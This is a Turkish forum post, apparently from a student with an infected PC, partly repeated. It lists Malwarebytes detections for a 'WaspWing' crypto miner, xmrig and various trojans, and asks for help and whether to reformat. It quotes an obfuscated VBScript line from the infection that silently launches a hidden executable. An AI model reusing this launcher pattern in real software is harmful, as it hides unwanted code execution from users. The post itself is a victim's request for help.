Paladynee
Hectopat
Daha fazla
- Cinsiyet
- Erkek
- Meslek
- Sakarya Üni. Öğrenci
Öncelikle iyi forumlar dilerim.
Yaklaşık 2 ay önce, bilgisayarımda derin bir temizlik yapmış, bilgisayarımda Bitcoin Miner, Trojan. Agent vesaire bulmuştum.
Bunların arasında WaspWing denen bir şey de vardı. Malware.AI falan yazıyordu.
Kaspersky'ın flash belleğe kurulan kurtarma programı ile her şeyi çözmüştüm. Tertemizdi bilgisayar.
Bugün kafama esti, Malwarebytes ile tarama yaptım. Sonuçlar şöyle:
En başta dosya yollarını falan da yazıyordum da üşendim.
1.vbs dikkatimi çekti, ne olduğunu merak ettim. İçerisinde şöyle bir kod yazılıydı:
Biraz gezindim. C:\ProgramData\Windows klasörünün WaspWing adlı BitCoinMiner'ın yuvası olduğunu düşünüyorum. Config. Json dosyası buldum içerde, içeriği ekteki resimdeki gibi.
Son bir sorum olarak; sizin ProgramData klasörünüzde Windows alt klasörü var mı?
Yardımcı olabilecek var mı? Format atmayı düşünüyorum.
Yaklaşık 2 ay önce, bilgisayarımda derin bir temizlik yapmış, bilgisayarımda Bitcoin Miner, Trojan. Agent vesaire bulmuştum.
Bunların arasında WaspWing denen bir şey de vardı. Malware.AI falan yazıyordu.
Kaspersky'ın flash belleğe kurulan kurtarma programı ile her şeyi çözmüştüm. Tertemizdi bilgisayar.
Bugün kafama esti, Malwarebytes ile tarama yaptım. Sonuçlar şöyle:
Kod:
Malware.AI.4223995770 File C:\ProgramData\Windows\Profile\waspwing.exe
Malware.AI.4245671814 File C:\ProgramData\Windows\xmrig-cuda.dll
Malware.AI.714237189 File
RiskWare.BitCoinMiner
Trojan.Agent
Trojan.Agent.TskLnk
Trojan.Agent.TskLnk
Trojan.Agent.TskLnk
Trojan.Agent.TskLnk
Trojan.Agent.TskLnk
Trojan.Banker
Trojan.BitCoinMiner
Trojan.BitCoinMiner
Trojan.BitCoinMiner
Trojan.BitCoinMiner
Trojan.BitCoinMiner.TskLnk
Trojan.BitCoinMiner.TskLnk
Trojan.BitCoinMiner.TskLnk
Trojan.BitCoinMiner.TskLnk
En başta dosya yollarını falan da yazıyordum da üşendim.
1.vbs dikkatimi çekti, ne olduğunu merak ettim. İçerisinde şöyle bir kod yazılıydı:
CreateObject(Replace("WScr86yipt.Sh86yell","86y","")).Run Replace("cmi767d /c servi767ice.ei767xe","i767",""), 0, False
Biraz gezindim. C:\ProgramData\Windows klasörünün WaspWing adlı BitCoinMiner'ın yuvası olduğunu düşünüyorum. Config. Json dosyası buldum içerde, içeriği ekteki resimdeki gibi.
Son bir sorum olarak; sizin ProgramData klasörünüzde Windows alt klasörü var mı?
Yardımcı olabilecek var mı? Format atmayı düşünüyorum.
Dosya Ekleri
Son düzenleyen: Moderatör: